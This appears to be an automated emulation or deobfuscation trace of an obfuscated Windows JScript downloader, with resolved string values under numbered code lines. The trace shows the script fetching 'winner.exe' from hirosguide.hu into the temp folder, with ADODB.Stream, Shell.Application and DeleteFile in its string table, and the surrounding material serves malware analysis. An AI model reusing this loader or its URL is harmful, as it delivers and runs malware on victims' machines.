                                                                                                                                                                                                                                                                                            • _0x4495() ➔ pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream
                                                                                                                                                                                                                                                                                            • _0x4495() ➔ vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0
                                                                                                                                                                                                                                                                                            • _0x4495() ➔ vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0
                                                                                                                                                                                                                                                                                            • _0x4495() ➔ FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9
                                                                                                                                                                                                                                                                                            • _0x4495() ➔ cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo
                                                                                                                                                                                                                                                                                            • _0x4495() ➔ 12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7
                                                                                                                                                                                                                                                                                            142
                                                                                                                                                                                                                                                                                            return _0x238569;
                                                                                                                                                                                                                                                                                              143
                                                                                                                                                                                                                                                                                              }, _0x4495 ( );
                                                                                                                                                                                                                                                                                                144
                                                                                                                                                                                                                                                                                                }
                                                                                                                                                                                                                                                                                                  145
                                                                                                                                                                                                                                                                                                  var pOut = new ActiveXObject ( _0x406710 ( 0x1f7, _0x25fd55 ( 0xcf, 'uW23' ) ) ) ['GetSpecialFolder'] ( 0x2 ) + '\x5cwinner.exe', Object = WScript[_0x1f863f ( 0x203 ) ] ( _0x1f863f ( 0x206 ) );
                                                                                                                                                                                                                                                                                                  • _0x25fd55(207,"uW23") ➔ "du%R"
                                                                                                                                                                                                                                                                                                  • _0x406710(503,"du%R") ➔ "Scripting.FileSystemObject"
                                                                                                                                                                                                                                                                                                  • GetSpecialFolder(2) ➔ C:\Users\alfons\AppData\Local\Temp
                                                                                                                                                                                                                                                                                                  • _0x31b8(515) ➔ "CreateObject"
                                                                                                                                                                                                                                                                                                  • _0x31b8(518) ➔ "MSXML2.XMLHTTP"
                                                                                                                                                                                                                                                                                                  • Windows Script Host.CreateObject("MSXML2.XMLHTTP") ➔
                                                                                                                                                                                                                                                                                                  146
                                                                                                                                                                                                                                                                                                  function _0x31b8(_0x3868af, _0x4b1369) {
                                                                                                                                                                                                                                                                                                  • _0x31b8(498) ➔ "SaveToFile"
                                                                                                                                                                                                                                                                                                  • _0x31b8(498) ➔ "W7mUrSkZ"
                                                                                                                                                                                                                                                                                                  • _0x31b8(498) ➔ "2383633jjSiic"
                                                                                                                                                                                                                                                                                                  • _0x31b8(498) ➔ "Send"
                                                                                                                                                                                                                                                                                                  • _0x31b8(498) ➔ "438285eiwTzG"
                                                                                                                                                                                                                                                                                                  • _0x31b8(493) ➔ "2383633jjSiic"
                                                                                                                                                                                                                                                                                                  • _0x31b8(501) ➔ "891608JWBVoS"
                                                                                                                                                                                                                                                                                                  • _0x31b8(512) ➔ "12775480EBnljO"
                                                                                                                                                                                                                                                                                                  • _0x31b8(515) ➔ "CreateObject"
                                                                                                                                                                                                                                                                                                  • _0x31b8(518) ➔ "MSXML2.XMLHTTP"
                                                                                                                                                                                                                                                                                                  147
                                                                                                                                                                                                                                                                                                  var _0x50e4f1 = _0x4495 ( );
                                                                                                                                                                                                                                                                                                  • _0x4495() ➔ 12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7
                                                                                                                                                                                                                                                                                                  • _0x4495() ➔ F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO
                                                                                                                                                                                                                                                                                                  • _0x4495() ➔ 45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject
                                                                                                                                                                                                                                                                                                  • _0x4495() ➔ MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie
                                                                                                                                                                                                                                                                                                  • _0x4495() ➔ SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S
                                                                                                                                                                                                                                                                                                  • _0x4495() ➔ SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S
                                                                                                                                                                                                                                                                                                  • _0x4495() ➔ SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S
                                                                                                                                                                                                                                                                                                  • _0x4495() ➔ SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S
                                                                                                                                                                                                                                                                                                  • _0x4495() ➔ SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S
                                                                                                                                                                                                                                                                                                  • _0x4495() ➔ SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG,Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S
                                                                                                                                                                                                                                                                                                  148
                                                                                                                                                                                                                                                                                                  return _0x31b8 =
                                                                                                                                                                                                                                                                                                    149
                                                                                                                                                                                                                                                                                                    function (_0x1853fb, _0x4c628) {
                                                                                                                                                                                                                                                                                                    • _0x31b8(498,undefined) ➔ "SaveToFile"
                                                                                                                                                                                                                                                                                                    • _0x31b8(498,undefined) ➔ "W7mUrSkZ"
                                                                                                                                                                                                                                                                                                    • _0x31b8(498,undefined) ➔ "2383633jjSiic"
                                                                                                                                                                                                                                                                                                    • _0x31b8(498,undefined) ➔ "Send"
                                                                                                                                                                                                                                                                                                    • _0x31b8(498,undefined) ➔ "438285eiwTzG"
                                                                                                                                                                                                                                                                                                    • _0x31b8(493,undefined) ➔ "2383633jjSiic"
                                                                                                                                                                                                                                                                                                    • _0x31b8(501,undefined) ➔ "891608JWBVoS"
                                                                                                                                                                                                                                                                                                    • _0x31b8(512,undefined) ➔ "12775480EBnljO"
                                                                                                                                                                                                                                                                                                    • _0x31b8(515,undefined) ➔ "CreateObject"
                                                                                                                                                                                                                                                                                                    • _0x31b8(518,undefined) ➔ "MSXML2.XMLHTTP"
                                                                                                                                                                                                                                                                                                    150
                                                                                                                                                                                                                                                                                                    _0x1853fb = _0x1853fb - 0x1e8;
                                                                                                                                                                                                                                                                                                      151
                                                                                                                                                                                                                                                                                                      var _0x1cea82 = _0x50e4f1[_0x1853fb];
                                                                                                                                                                                                                                                                                                        152
                                                                                                                                                                                                                                                                                                        return _0x1cea82;
                                                                                                                                                                                                                                                                                                          153
                                                                                                                                                                                                                                                                                                          }, _0x31b8 ( _0x3868af, _0x4b1369 );
                                                                                                                                                                                                                                                                                                            154
                                                                                                                                                                                                                                                                                                            }
                                                                                                                                                                                                                                                                                                              155
                                                                                                                                                                                                                                                                                                              Object[_0x1f863f ( 0x1f0 ) ] ( _0x406710 ( 0x1f3, _0xfacb16 ( 0xab ) ), _0x1f863f ( 0x1ef ), ! [] ), Object[_0x1f863f ( 0x1ee ) ] ( );
                                                                                                                                                                                                                                                                                                              • _0x1f863f(496) ➔ "Open"
                                                                                                                                                                                                                                                                                                              • _0xfacb16(171) ➔ "3o8g"
                                                                                                                                                                                                                                                                                                              • _0x406710(499,"3o8g") ➔ "GET"
                                                                                                                                                                                                                                                                                                              • _0x1f863f(495) ➔ "https://hirosguide.hu/ti/winner.exe"
                                                                                                                                                                                                                                                                                                              • Open("GET","https://hirosguide.hu/ti/winner.exe",false) ➔ undefined
                                                                                                                                                                                                                                                                                                              • _0x1f863f(494) ➔ "Send"
                                                                                                                                                                                                                                                                                                              • Send() ➔ undefined
                                                                                                                                                                                                                                                                                                              156
                                                                                                                                                                                                                                                                                                              var Stream = WScript[_0x1f863f ( 0x203 ) ] ( _0x1f863f ( 0x1fb ) );
                                                                                                                                                                                                                                                                                                              • _0x1f863f(515) ➔ "CreateObject"
                                                                                                                                                                                                                                                                                                              • _0x1f863f(507) ➔ "ADODB.Stream"
                                                                                                                                                                                                                                                                                                              • Windows Script Host.CreateObject("ADODB.Stream") ➔
                                                                                                                                                                                                                                                                                                              157
                                                                                                                                                                                                                                                                                                              function _0x10bd(_0x11a177, _0x26656a) {
                                                                                                                                                                                                                                                                                                              • _0x10bd(202) ➔ "Open"
                                                                                                                                                                                                                                                                                                              • _0x10bd(202) ➔ "WPNdVhRcR8kzWQK"
                                                                                                                                                                                                                                                                                                              • _0x10bd(200) ➔ "rmkoj8oa"
                                                                                                                                                                                                                                                                                                              • _0x10bd(161) ➔ "cz*B"
                                                                                                                                                                                                                                                                                                              • _0x10bd(202) ➔ "3o8g"
                                                                                                                                                                                                                                                                                                              • _0x10bd(200) ➔ "Open"
                                                                                                                                                                                                                                                                                                              • _0x10bd(161) ➔ "W5ZdI13cMmk4B2fiW4xdTW"
                                                                                                                                                                                                                                                                                                              • _0x10bd(166) ➔ "35751wCkNjf"
                                                                                                                                                                                                                                                                                                              • _0x10bd(192) ➔ "172CBHuQO"
                                                                                                                                                                                                                                                                                                              • _0x10bd(215) ➔ "W4eBm1u"
                                                                                                                                                                                                                                                                                                              158
                                                                                                                                                                                                                                                                                                              var _0x33f15e = _0x33f1 ( );
                                                                                                                                                                                                                                                                                                              • _0x33f1() ➔ jjEhYu,WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSkWWRb9cuhdOSk3,pAZheY,length,h0H+WOxcJbWDWRJcSmkoWOlcR0y,35751wCkNjf,&DC),198188fskAji,F8kCWOxdSH1PW4e,whGqWOWIpCkIW71DWQruaW,EsmPWRrqsmkRtK/dO8kbamoekMNdSSoScxhdOmodWPVcRtzEereujMdcHMJcMmkSpXnMcmkYWQ5gFmkNvhpcOZlcVeNcOvD6dCoxWQ/cSmkfWQ5gA8odW6iYWRbb,vsWRWQK,WR7cMfrp,W5BcVetcV8osW7zdW68,hSoxWORdHNVdN8klW7G,WOZcLbldI3rPW5jqtSo2,WQNcGrH+WQq,25828720vLEpnk,pmkFW50dCG0jW4LoWPS,Send,12618EMHTyj,mCk/fMJcKCoaxeHDWQ1tWQLEv1xdTHqkWQPruxXUwLZdPa,Close,W4PEFry,zKbRWOpcIgODuuhdMCkwDG,252cwJMcn,W5RcOGxcPSoyWO3dSqG,W57dHuVcIa8+W5bgzmoddvu,WOJdI8o5WOtcJCk0,W7mUrSkZ,W64EsSoZW6ldTxZdO8oKWR09WQlcKmkaimoVo0NdQIm,172CBHuQO,WPZdJwWYW5RcT3RdGGGnlgBcSq,ADODB.Stream,W6ZcGIqLqNC,a8oErHFcRCoYWOudaCkTWQaTpNa5lXXzW7qF,51926vemoDJ,gM3dJZ48WOy8WOFdMsZdQCkaW7S,rmkoj8oa,Open,WPNdVhRcR8kzWQK,3o8g,Type,indexOf,W6fsbSk5WOVcUYv+tsCGaZC,pfOEWQ0,W6ldLeaRW7enWOncnxNdHCkQ,gHZcL8o9k2ZdOZ1bW7BcJSoxWRWt,dmoHW7v3BKGbW6/cMSoQpSk/,CreateObject,W6rYdtFcS8oa,iCoWWQi,W5j3WQD+W4RdLXnfW7VdMCowW7CgWQW,WR7dMNbNmJVcICkHa8oQW6RcQSo0,W4eBm1u
                                                                                                                                                                                                                                                                                                              • _0x33f1() ➔ WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSkWWRb9cuhdOSk3,pAZheY,length,h0H+WOxcJbWDWRJcSmkoWOlcR0y,35751wCkNjf,&DC),198188fskAji,F8kCWOxdSH1PW4e,whGqWOWIpCkIW71DWQruaW,EsmPWRrqsmkRtK/dO8kbamoekMNdSSoScxhdOmodWPVcRtzEereujMdcHMJcMmkSpXnMcmkYWQ5gFmkNvhpcOZlcVeNcOvD6dCoxWQ/cSmkfWQ5gA8odW6iYWRbb,vsWRWQK,WR7cMfrp,W5BcVetcV8osW7zdW68,hSoxWORdHNVdN8klW7G,WOZcLbldI3rPW5jqtSo2,WQNcGrH+WQq,25828720vLEpnk,pmkFW50dCG0jW4LoWPS,Send,12618EMHTyj,mCk/fMJcKCoaxeHDWQ1tWQLEv1xdTHqkWQPruxXUwLZdPa,Close,W4PEFry,zKbRWOpcIgODuuhdMCkwDG,252cwJMcn,W5RcOGxcPSoyWO3dSqG,W57dHuVcIa8+W5bgzmoddvu,WOJdI8o5WOtcJCk0,W7mUrSkZ,W64EsSoZW6ldTxZdO8oKWR09WQlcKmkaimoVo0NdQIm,172CBHuQO,WPZdJwWYW5RcT3RdGGGnlgBcSq,ADODB.Stream,W6ZcGIqLqNC,a8oErHFcRCoYWOudaCkTWQaTpNa5lXXzW7qF,51926vemoDJ,gM3dJZ48WOy8WOFdMsZdQCkaW7S,rmkoj8oa,Open,WPNdVhRcR8kzWQK,3o8g,Type,indexOf,W6fsbSk5WOVcUYv+tsCGaZC,pfOEWQ0,W6ldLeaRW7enWOncnxNdHCkQ,gHZcL8o9k2ZdOZ1bW7BcJSoxWRWt,dmoHW7v3BKGbW6/cMSoQpSk/,CreateObject,W6rYdtFcS8oa,iCoWWQi,W5j3WQD+W4RdLXnfW7VdMCowW7CgWQW,WR7dMNbNmJVcICkHa8oQW6RcQSo0,W4eBm1u,jjEhYu
                                                                                                                                                                                                                                                                                                              • _0x33f1() ➔ WOGynK1UEIHeaCoZd8ogza,3rnQ,tCk1WPiAW7/dOb3dQG,MSXML2.XMLHTTP,ASkCW6DM,WQpdJaNdUSkw,3080NCsyfc,E0RdL8o3lfldQcTd,cz*B,W5ZdI13cMmk4B2fiW4xdTW,bmo7FSkWWRb9cuhdOSk3,pAZheY,length,h0H+WOxcJbWDWRJcSmkoWOlcR0y,35751wCkNjf,&DC),198188fskAji,F8kCWOxdSH1PW4e,whGqWOWIpCkIW71DWQruaW,EsmPWRrqsmkRtK/dO8kbamoekMNdSSoScxhdOmodWPVcRtzEereujMdcHMJcMmkSpXnMcmkYWQ5gFmkNvhpcOZlcVeNcOvD6dCoxWQ/cSmkfWQ5gA8odW6iYWRbb,vsWRWQK,WR7cMfrp,W5BcVetcV8osW7zdW68,hSoxWORdHNVdN8klW7G,WOZcLbldI3rPW5jqtSo2,WQNcGrH+WQq,25828720vLEpnk,pmkFW50dCG0jW4LoWPS,Send,12618EMHTyj,mCk/fMJcKCoaxeHDWQ1tWQLEv1xdTHqkWQPruxXUwLZdPa,Close,W4PEFry,zKbRWOpcIgODuuhdMCkwDG,252cwJMcn,W5RcOGxcPSoyWO3dSqG,W57dHuVcIa8+W5bgzmoddvu,WOJdI8o5WOtcJCk0,W7mUrSkZ,W64EsSoZW6ldTxZdO8oKWR09WQlcKmkaimoVo0NdQIm,172CBHuQO,WPZdJwWYW5RcT3RdGGGnlgBcSq,ADODB.Stream,W6ZcGIqLqNC,a8oErHFcRCoYWOudaCkTWQaTpNa5lXXzW7qF,51926vemoDJ,gM3dJZ48WOy8WOFdMsZdQCkaW7S,rmkoj8oa,Open,WPNdVhRcR8kzWQK,3o8g,Type,indexOf,W6fsbSk5WOVcUYv+tsCGaZC,pfOEWQ0,W6ldLeaRW7enWOncnxNdHCkQ,gHZcL8o9k2ZdOZ1bW7BcJSoxWRWt,dmoHW7v3BKGbW6/cMSoQpSk/,CreateObject,W6rYdtFcS8oa,iCoWWQi,W5j3WQD+W4RdLXnfW7VdMCowW7CgWQW,WR7dMNbNmJVcICkHa8oQW6RcQSo0,W4eBm1u,jjEhYu
